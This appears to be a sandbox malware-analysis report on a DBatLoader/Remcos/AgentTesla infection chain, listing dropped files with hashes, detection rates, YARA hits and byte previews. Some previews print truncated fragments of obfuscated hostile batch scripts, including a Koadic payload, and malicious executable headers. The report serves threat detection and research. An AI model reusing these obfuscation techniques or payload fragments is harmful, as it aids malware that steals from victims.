                                                                                                        RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                          20240416-703661.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                            disktop.pif.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                              82__GT7568.PDF.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                SecuriteInfo.com.Win32.Evo-gen.25660.20544.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                  SecuriteInfo.com.Win32.Evo-gen.15258.6765.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                    rKjlbIeOH9.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                      CONFIRMATION ORDER1.batGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                        CONFIRMATION ORDER0.batGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse

                                                                                                                          Created / dropped Files

                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1310720
                                                                                                                          Entropy (8bit):0.7067168232326468
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6VqN:2JIB/wUKUKQncEmYRTwh0p
                                                                                                                          MD5:8107C44FFAE18504731873FF06C8ABE1
                                                                                                                          SHA1:C07323DF119B7CB044660066615A03D5BFFF550C
                                                                                                                          SHA-256:D763396AE855BCF39008DD03A914A059DEC87C400398F3A1A442C27E2B8F0F8E
                                                                                                                          SHA-512:A1C1A28EDDBC74D95ECB092184A5F268F4995602CF3BA0E187C67E7B480F83D83B4DBA7D21C5EA9A3639F79F10BB1719468EA4CF9CD647A5048CFC8B0370EFF5
                                                                                                                          Malicious:false
                                                                                                                          Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x5990b467, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1310720
                                                                                                                          Entropy (8bit):0.7900120382330043
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:zSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:zazaPvgurTd42UgSii
                                                                                                                          MD5:87B55928FC615D66251922BB21FFFF71
                                                                                                                          SHA1:02057BCCD711301E9457B0625F94230E2D5DF3EF
                                                                                                                          SHA-256:5A4FAB1A20F616FF00E04A119ED37139AAACC41DC3194FB451FBFF503D6D1F21
                                                                                                                          SHA-512:AA208B518015D51C2D578E1E65B4FC7408F9123CA144348D906B2D4B53BBD884FD2150DE9596825C16BCD98B920F8FA734F7F9C9C71D6CBC39DB9355AA8EB998
                                                                                                                          Malicious:false
                                                                                                                          Preview:Y..g... ...............X\...;...{......................0.`.....42...{5..-...|..h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{.......................................-...|...................;..-...|...........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):16384
                                                                                                                          Entropy (8bit):0.08244686514367672
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:1ZlllyYeAc9hg1t/57Dek3Jh2IQlallEqW3l/TjzzQ/t:VllyzxhgHR3t2Amd8/
                                                                                                                          MD5:1278C12E3DCE809C7FE1D27BFD5B7B2B
                                                                                                                          SHA1:E130000151DBFEDC6C2E7D175A16FF39EBE73380
                                                                                                                          SHA-256:8C574CE134E618AB83C42537E68A97BFC0610A5320CC81E420829C596AE19B58
                                                                                                                          SHA-512:F78DAEAD1C0D4FA022B47AB8B94BB12FA6B38FFD4BDE4299DA499E58A23DBD77D5148B17B99312CBD0316676B6CDBF4CA1276E3C587C2AF7245D925E8B6E081F
                                                                                                                          Malicious:false
                                                                                                                          Preview:.........................................;...{...-...|..42...{5.........42...{5.42...{5...Y.42...{59.................;..-...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\Public\Libraries\KDECO.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\uc.exe
                                                                                                                          File Type:DOS batch file, ASCII text, with very long lines (468), with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3646
                                                                                                                          Entropy (8bit):5.383959173452972
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:Zx2A0d5a9zHPwo0uP6SXjr4XtgPmon38JV7ZVhvoXS966hYxcdF4AlM5NQYE2Pl+:3L6jThc/pkmZAXpA2
                                                                                                                          MD5:71E46EFE9932B83B397B44052513FB49
                                                                                                                          SHA1:741AF3B8C31095A0CC2C39C41E62279684913205
                                                                                                                          SHA-256:11C20FABF677CD77E8A354B520F6FFCA09CAC37CE15C9932550E749E49EFE08A
                                                                                                                          SHA-512:76DA3B441C0EAAAABDD4D21B0A3D4AA7FD49D73A5F0DAB2CFB39F2E114EFE4F4DABE2D46B01B66D810D6E0EFA97676599ECE5C213C1A69A5F2F4897A9B4AC8DA
                                                                                                                          Malicious:false
                                                                                                                          Preview:@echo off..set "Nnqr=set "..%Nnqr%"njyC=="..%Nnqr%"qkMvMLsfma%njyC%http"..%Nnqr%"dbvWEsxWns%njyC%rem "..%Nnqr%"NpzRZtRBVV%njyC%Cloa"..%Nnqr%"ftNVZzSZxa%njyC%/Bat"..%Nnqr%"TwupSEtIWD%njyC%gith"..%Nnqr%"yIGacXULig%njyC%k"..%Nnqr%"uGlGnqCSun%njyC%h2sh"..%Nnqr%"FUsYUbfxRq%njyC%s://"..%Nnqr%"ewghYLVJDJ%njyC%om/c"..%Nnqr%"ZxOeNaoDFO%njyC%ub.c"..%dbvWEsxWns%%qkMvMLsfma%%FUsYUbfxRq%%TwupSEtIWD%%ZxOeNaoDFO%%ewghYLVJDJ%%uGlGnqCSun%%ftNVZzSZxa%%NpzRZtRBVV%%yIGacXULig%..%Nnqr%"dbvWEsxWns%njyC%@ech"..%Nnqr%"qkMvMLsfma%njyC%o of"..%Nnqr%"FUsYUbfxRq%njyC%f"..%dbvWEsxWns%%qkMvMLsfma%%FUsYUbfxRq%..%Nnqr%"NOtbuvMLuE%njyC%alph"..%Nnqr%"jSzGRzcKvC%njyC%ul 2"..%Nnqr%"KhBjpctAkV%njyC%.exe"..%Nnqr%"ftNVZzSZxa%njyC%c32."..%Nnqr%"czhHhGJsdj%njyC%m32\"..%Nnqr%"TOzhrohQZT%njyC% C:\"..%Nnqr%"NpzRZtRBVV%njyC%exe "..%Nnqr%"ppIMorhdlj%njyC% &"..%Nnqr%"SXdBSshqoL%njyC%Publ"..%Nnqr%"apGEijJnKT%njyC%\cmd"..%Nnqr%"qkMvMLsfma%njyC%Wind"..%Nnqr%"QxcSEoHMVZ%njyC%s\\S"..%Nnqr%"AvhQIkjRki%njyC%a.ex"..%Nnqr%"yIGacXULig%njyC%/

                                                                                                                          C:\Users\Public\Libraries\Null

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\uc.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4
                                                                                                                          Entropy (8bit):2.0
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Bv:Z
                                                                                                                          MD5:6E7931A650D82FA4F83332BEBE8AD018
                                                                                                                          SHA1:311732BAD841789F43C3EF055A9FDF8A261AE4A8
                                                                                                                          SHA-256:CE60DA21A19E0A3D484FC4EE3F868999745B7F23475772EA8C87C7BDE54C4B43
                                                                                                                          SHA-512:BD7BBFA2722C680021FFA084438E4303283D866D24CE62BE842D4115C6094B4AA891CBBFCDB1CAD59D68A6A54649738EE4DB198DA3B5EEB25E07ACC5FD357426
                                                                                                                          Malicious:false
                                                                                                                          Preview:21..

                                                                                                                          C:\Users\Public\Libraries\Ucvuiswb

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\uc.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):599202
                                                                                                                          Entropy (8bit):7.05520368590051
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:6l/6EU9okQLUg90U56QKfIEhMfHU0MlXk5:6l/c9okkYUYHQEIHxMlXS
                                                                                                                          MD5:83DDE1E0DA8E837B3C94EE26FE5E9FE1
                                                                                                                          SHA1:7851FCC15BDBCE2DCB0565FE78F52DC879A14569
                                                                                                                          SHA-256:3183D63A4383372B36A88237E077FF92960605391CE897B55E3B0D4384A1FCCD
                                                                                                                          SHA-512:ADC2B0B71971AB1494AF4B90F0B6101E1BC4001F6A318ADE2651494E46E9DFDECF0594AB37E5A9886342F291A51A0508D96131EE62BE74D5FADFFD1B64070761
                                                                                                                          Malicious:true
                                                                                                                          Preview:KIJFaV..BaDh"".aDEF!GKIJ""DaEDVXEDBa.*,8+'0:7$8458/=79'9+58*/;'4%8<9+5($=%,4;01496)/&09+'8-83$8.+(<<.=/(*5*-/<(4&79,'%(.9'*;):*19*-++:KIJFaV..BaDh"".aDEF!GKIJ""DaEDVXEDBa.&98,6:%29)KIJFaV..BaDh"".aDEF!GKIJ""DaEDVXEDBa/*...1#q6)8.;;'@69...;;2.q'.+;4425...+'<q-1.?A1.'0...q*@:)8.%+4A/=...;-%.A(.,<A1&%...1-3$3*.?-%22:...q(/-37.q?=5.=...?(=5#/.1?-5A9....:-19;.'?A7$/...%,@053.q)#%A<...2-=#0/.2?.64,...$>/#q).0&A#0+...0'@2&0.A/@988...?,A288.)8/9(8...;+,@(,.5#)946...*>#&5-.=/@/2(...3$0#8*.)709'7...++&4&*./=2,4*...@)215+.*=?)54...3<A&4+.8....PPSL]]GD.f..mIG^<DH]\W"j....iOU\]SBTN.f.......NPZJZYSKV.O]RTS]BNZe...........m^.MT[.jYO_S.9GI.g\SIBZG4CO..MQZD]..EK]?V]NYMMOM1Q[UBBSTTO...........mccNeWWD.EUD.T]X[GQOG[.`B\`B.ZoHWP.oB`XGP.CC[`KCDKG.QTD]Y`XQV..........^YY`_R.Bp......eklXiVGB._JB W`G^UVBFEiT_U^OKC!Z`S..T[Y[^.H`S@EGP\Pl....phg^JC.RFXDOWLMLT,P7m.\EVV.c!..jghf. G\GROTQ.SQJHU.J4\]EG]^QE.....fhek!..ZYGD]N..]OGZHHH..fX.GCCp[CRlZTUFSC^Y[!RHII.VM.^GM..YQ.ER.LHSCLB`O....;nRNMg.GKV]FRFPRW.kni%....GFJPYM

                                                                                                                          C:\Users\Public\Libraries\Ucvuiswb.PIF

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1646592
                                                                                                                          Entropy (8bit):7.466963242088156
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:NGLyrlj2BH1btTfnxx+KKozJQd/HJNRO/BwTQ+l04pEnlk8U2flxAu:NGup2B+K1mzywTQh4psG2Z
                                                                                                                          MD5:E6AC6CA27AA2D60DC59A21AF1FFDB086
                                                                                                                          SHA1:9F847E34521E8917C8B22ECA53B71306BC19AF18
                                                                                                                          SHA-256:A5B3CE892D48757DF98FEA906DFF92E0210DCBD8D1832E43DFBD2A5ECE61FBA1
                                                                                                                          SHA-512:9F4C1E3CB03CD1333A7F2E01F7A3D61803844FC4C1531DD432CC7B7DEDC5625D1253715200CB7E0F6B9C7F906A6DCBB488196153E1E2DC935B27B66D74431EE4
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                          • Antivirus: Virustotal, Detection: 38%, Browse
                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................p..........D.............@..............................................@........................... ..X$...........................p...`...........................`.......................&...............................text....g.......h.................. ..`.itext...............l.............. ..`.data...LK.......L...t..............@....bss....l6...............................idata..X$... ...&..................@....tls....4....P...........................rdata.......`......................@..@.reloc...`...p...b..................@..B.rsrc................J..............@..@..................... ..............@..@................................................................................................

                                                                                                                          C:\Users\Public\Libraries\UcvuiswbO.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\uc.exe
                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (15012), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):30026
                                                                                                                          Entropy (8bit):3.9380000056299878
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:IBOY7cKQ/CyntVZjpubO0bXWQtagxP2+3o5WIGbfJTAy:C
                                                                                                                          MD5:828FFBF60677999579DAFE4BF3919C63
                                                                                                                          SHA1:A0D159A1B9A49E9EACCC53FE0C3266C0526A1BDC
                                                                                                                          SHA-256:ABAC4A967800F5DA708572EC42441EC373CD52459A83A8A382D6B8579482789D
                                                                                                                          SHA-512:BF00909E24C5A6FB2346E8457A9ADACD5F1B35988D90ABBDE9FF26896BBB59EDAFEA60D9DB4D10182A7B5E129BB69585D3E20BC5C63AF3517B3A7EF1E45FFB7E
                                                                                                                          Malicious:false
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: MALWARE_BAT_KoadicBAT, Description: Koadic post-exploitation framework BAT payload, Source: C:\Users\Public\Libraries\UcvuiswbO.bat, Author: ditekSHen
                                                                                                                          Preview:..&@cls&@set "_...=H zAnOeUIivpoS3l71mXMxw8yaqYTEuKgFGPJZRfr@k6Wj9sbQB4VtLD2d0C5Nch"..%_...:~41,1%%_...:~47,1%%_...:~6,1%%_...:~53,1%%_...:~1,1%"_...=%_...:~10,1%%_...:~39,1%%_...:~16,1%%_...:~13,1%%_...:~25,1%%_...:~53,1%%_...:~42,1%%_...:~22,1%%_...:~18,1%%_...:~48,1%%_...:~51,1%%_...:~2,1%%_...:~61,1%%_...:~9,1%%_...:~19,1%%_...:~44,1%%_...:~50,1%%_...:~57,1%%_...:~26,1%%_...:~4,1%%_...:~62,1%%_...:~3,1%%_...:~33,1%%_...:~38,1%%_...:~40,1%%.......%%_...:~60,1%%_...:~0,1%%_...:~43,1%%_...:~34,1%%_...:~58,1%%_...:~15,1%%_...:~7,1%%_...:~20,1%%_...:~49,1%%_...:~35,1%%_...:~14,1%%_...:~30,1%%_...:~36,1%%_...:~41,1%%_...:~45,1%%_...:~11,1%%_...:~55,1%%_...:~32,1%%_...:~17,1%%_...:~63,1%%_...:~56,1%%_...:~21,1%%_...:~37,1%%_...:~8,1%%_...:~54,1%%_...:~28,1%%_...:~6,1%%.......%%_...:~5,1%%_...:~59,1%%_...:~52,1%%_...:~29,1%%_...:~24,1%%_...:~12,1%%_...:~46,1%%_...:~47,1%%_...:~1,1%%_...:~23,1%%_...:~27,1%%_...:~31,1%"..%_...:~38,1%%_...:~59,1%%_...:~51,1%%_...:~5,1%%_...:~60,1%"_....=%_...

                                                                                                                          C:\Users\Public\Libraries\bwsiuvcU.pif

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\uc.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:modified
                                                                                                                          Size (bytes):68096
                                                                                                                          Entropy (8bit):6.328046551801531
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
                                                                                                                          MD5:C116D3604CEAFE7057D77FF27552C215
                                                                                                                          SHA1:452B14432FB5758B46F2897AECCD89F7C82A727D
                                                                                                                          SHA-256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                                                                                                                          SHA-512:9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                          Joe Sandbox View:
                                                                                                                          • Filename: ORDER-CONFIRMATION-DETAILS-000235374564.cmd, Detection: malicious, Browse
                                                                                                                          • Filename: RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZ, Detection: malicious, Browse
                                                                                                                          • Filename: 20240416-703661.cmd, Detection: malicious, Browse
                                                                                                                          • Filename: disktop.pif.exe, Detection: malicious, Browse
                                                                                                                          • Filename: 82__GT7568.PDF.exe, Detection: malicious, Browse
                                                                                                                          • Filename: SecuriteInfo.com.Win32.Evo-gen.25660.20544.exe, Detection: malicious, Browse
                                                                                                                          • Filename: SecuriteInfo.com.Win32.Evo-gen.15258.6765.exe, Detection: malicious, Browse
                                                                                                                          • Filename: rKjlbIeOH9.exe, Detection: malicious, Browse
                                                                                                                          • Filename: CONFIRMATION ORDER1.bat, Detection: malicious, Browse
                                                                                                                          • Filename: CONFIRMATION ORDER0.bat, Detection: malicious, Browse
                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....8.......................p....................@.............................................. ...................p.......`...............................................................P.......................................................text............................... ..`.data....p.......0..................@....tls.........@......................@....rdata.......P......................@..P.idata.......`......................@..@.edata.......p......................@..@

                                                                                                                          C:\Users\Public\Libraries\easinvoker.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\uc.exe
                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):131648
                                                                                                                          Entropy (8bit):5.225468064273746
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:zar2xXibKcf5K67+k02XbFbosspwUUgcR:Nibl7+k02XZb9UA
                                                                                                                          MD5:231CE1E1D7D98B44371FFFF407D68B59
                                                                                                                          SHA1:25510D0F6353DBF0C9F72FC880DE7585E34B28FF
                                                                                                                          SHA-256:30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
                                                                                                                          SHA-512:520887B01BDA96B7C4F91B9330A5C03A12F7C7F266D4359432E7BACC76B0EEF377C05A4361F8FA80AD0B94B5865699D747A5D94A2D3DCDB85DABF5887BB6C612
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                          Joe Sandbox View:
                                                                                                                          • Filename: HFiHWvPsvA.rtf, Detection: malicious, Browse
                                                                                                                          • Filename: payment swift.xls, Detection: malicious, Browse
                                                                                                                          • Filename: VdwJB2cS5l.exe, Detection: malicious, Browse
                                                                                                                          • Filename: SecuriteInfo.com.Win32.RATX-gen.9491.24773.exe, Detection: malicious, Browse
                                                                                                                          • Filename: Purchase order.exe, Detection: malicious, Browse
                                                                                                                          • Filename: Quotation 20242204.exe, Detection: malicious, Browse
                                                                                                                          • Filename: pSfqOmM1DG.exe, Detection: malicious, Browse
                                                                                                                          • Filename: XY2I8rWLkM.exe, Detection: malicious, Browse
                                                                                                                          • Filename: 2020.xls, Detection: malicious, Browse
                                                                                                                          • Filename: Quotation 20241804.exe, Detection: malicious, Browse
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........GF..)...)...).,.....).,.....).,.....)...(.V.).,.....).,.....).,.....).,.....).Rich..).........................PE..d...^PPT.........."..........D...... ..........@............................. ......z................ ..................................................................@&......4....................................................................................text............................... ..`.imrsiv..................................data...............................@....pdata..............................@..@.idata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................

                                                                                                                          C:\Users\Public\Libraries\netutils.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\uc.exe
                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):115180
                                                                                                                          Entropy (8bit):5.090281411774507
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:iuuRxID3z1yUXtZKmsryc/o5jdePNtq8YCl7MbiRVRBfY+u:iuuRa/ZZK4c/UePNtq8nRBfY+u
                                                                                                                          MD5:6BAAEA4D3A65281B55173738795EB02C
                                                                                                                          SHA1:1FBE7EC7F5E2D1FB0AB1807E149EEE66A86F9224
                                                                                                                          SHA-256:0007FA57DA2E1DE2E487492D00B99ABAECA7E9F9CAC8A10E24EB569E19F76EE1
                                                                                                                          SHA-512:AF0285CF961AEAE960EDE41F195809E9B84CCB262F17F2E994DA5C599EBDF712788E5A3F2E0E2ED16E67AA888BDABFD7A6096AD8DDA2D062D2F82B010E81D5C5
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                          • Antivirus: Virustotal, Detection: 47%, Browse
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....&f.X........& ....."....................<a.............................0.......:........ ..............................................................`..(...............\........................... ...(...................................................text...p .......".................. .P`.data...P....@.......(..............@.P..rdata.......P.......*..............@.P@.pdata..(....`.......0..............@.0@.xdata.......p.......4..............@.0@.bss..................................p..edata...............6..............@.0@.idata...............8..............@.0..CRT....X............@..............@.@..tls....h............B..............@.`..reloc..\............D..............@.0B/4...................F..............@.PB/19..................J..............@..B/31.....%...........................@..B/45.....q...........................@..B/57.....

                                                                                                                          C:\Users\Public\Ucvuiswb.url

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\uc.exe
                                                                                                                          File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Ucvuiswb.PIF">), ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):100
                                                                                                                          Entropy (8bit):5.041307755889416
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMDPhCSsb+Uo0Pjn:HRYFVmTWDyzuErbjn
                                                                                                                          MD5:64D91CB26E13C242023735D5311725A4
                                                                                                                          SHA1:1B3B3318CDB9098A3DCAD96ECF57D983663E5013
                                                                                                                          SHA-256:98DCFD594B2BEFC0AFF0F77CB17E65BA85A89104A848DC003C81289A3C1B6635
                                                                                                                          SHA-512:F4DB5FF98FF1A3D3CE1D22A4566BB3267EBBD3A23677BCE40A47742A020DCD5632ADFEB5E3B98397449C0C7635B675CEABD042FE7689F07253BE69A9CE4D4FBD
                                                                                                                          Malicious:true
                                                                                                                          Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Ucvuiswb.PIF"..IconIndex=61..HotKey=50..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\yt[1].hta

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\mshta.exe
                                                                                                                          File Type:PGP Secret Sub-key -
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):78133
                                                                                                                          Entropy (8bit):6.266039571888932
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:JGgLIQnvgGY9GpGOG2GSGhGKpSozTqQZwnLPcS:TvTY9GpGOG2GSGhGKpvzTTZeLUS
                                                                                                                          MD5:16D297E8EEE126E4B52198EFF43B6C36
                                                                                                                          SHA1:5FF70DD47D868EDB3F837511A55030810EC7968B
                                                                                                                          SHA-256:9A3B2D8D0E1DA113F6C12A4D1517C71B8810006A3031CF129CE2ACE2B2BE673F
                                                                                                                          SHA-512:604EF34A0953D7FA1A435115F603CA45FF5B26F5033D1611D28FEBE2440B45E8506EF5F8EABF1B6302D4AE61A10964F6086B4E3387C3C5AAB06932BACE13C6E5
                                                                                                                          Malicious:false
                                                                                                                          Preview:...."...JX-.....`..+6..C..x$.v....z.R.....7^...fa.8..`'.o3UP..I.......o.......8...b.7.R........wOJ......s.(....rs.Q0..{.....o.5r....C...Wx....{.....B.........[..,.e^m.r2Fr..|./h...8X.:..T.$..E(.....~)...,..q[..v4.\R.^oi..M>s....>Ru...o.....U.R\...#../e.=..y<A.^LN./...O.K5....(.....E..p.......M.[[....C'.0\..qQ2v......B>....o%.g.. .h.i.ap8...C.fNq.a.....[u..!....Y.6.Z..W.kvJ..S....y...(.e..0.n...vCE...y...l2DgQ....~.U.m.j...j.CB.R.La....2[_.I:.v. M..3...Z6.P.#..2........1.?}..l."..\.W..t.}.;....X..o.n$...0A......QP%..o.T.5.t..y....=...<.!:..2...h.qz...Y'hC...x.....{M3.3...B.......#..../l.,....Ku..J.$F#...5&[r..w...../>K.yy1.a..r.....T.......Gf.J........C.j.x\/.T.G....C&.B.2.<...n.#P.4..U...M.'...K...x~t..-g....0_.M.5m...Fi.?^....l.B.7.5.....V z!.W...1..[8.......J..I..o..Q.}.ol.oR.[...j..........p.=.R..9.0-._...i.9.F.&....Q..^..)...Vb.1.V...%:.....)....~.r.^..5............O........']..{j.S.".N1.........../E["t...5d....[...J...o.e..7..t

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):9434
                                                                                                                          Entropy (8bit):4.9243637703272345
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:exoe5lpOdxoe56ib49Vsm5emdagkjDt4iWN3yBGHB9smMdcU6CBdcU6Ch9smPpOU:cVib49Vkjh4iUx4cYKib4o
                                                                                                                          MD5:EF4099FCAB6D29945272316889156337
                                                                                                                          SHA1:5AAFAD4581D21179B892604BEBD6038792F8CBD6
                                                                                                                          SHA-256:A86220AB1F2A5498457C8801DFCBB2FE3EA6977378CE7E3EEBD007336AFDB3BC
                                                                                                                          SHA-512:EC9BB5508D39E6C038878F789DE84F7FBDC87CD20AE3EF81D68BC6589784ADB98EDCDEBF544A463C0AB2F01F52B743803A49A4F3A54FD3D003851B7DEEB8014C
                                                                                                                          Malicious:false
                                                                                                                          Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2920
                                                                                                                          Entropy (8bit):5.449039162601703
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:4OAzsSU4xymI4RfoUeCa+m9qr9t5/78Nfk+GGxJZKaVEouYAgwd64rHLjtvt:1AzlHxvIIwLz9qrh7KfkUJ5Eo9Adrxt
                                                                                                                          MD5:937B7C51E18308029AF0712C90527DF8
                                                                                                                          SHA1:3138CAC41F1620E3823BA42E8940897D0E9D33B9
                                                                                                                          SHA-256:DBBE368ED1DA16AC950E52E3654DEDA0A4BABADAFF98174DC4D2B688D9814D4C
                                                                                                                          SHA-512:9D1E60571389C319B0E6ACC257357FD176913BE9CF695404C093094CA88EA4DC6095C8E0475B48050653FA651A98826BDC7D463C6CAA1DDB9AA75D47DE1B30D8
                                                                                                                          Malicious:false
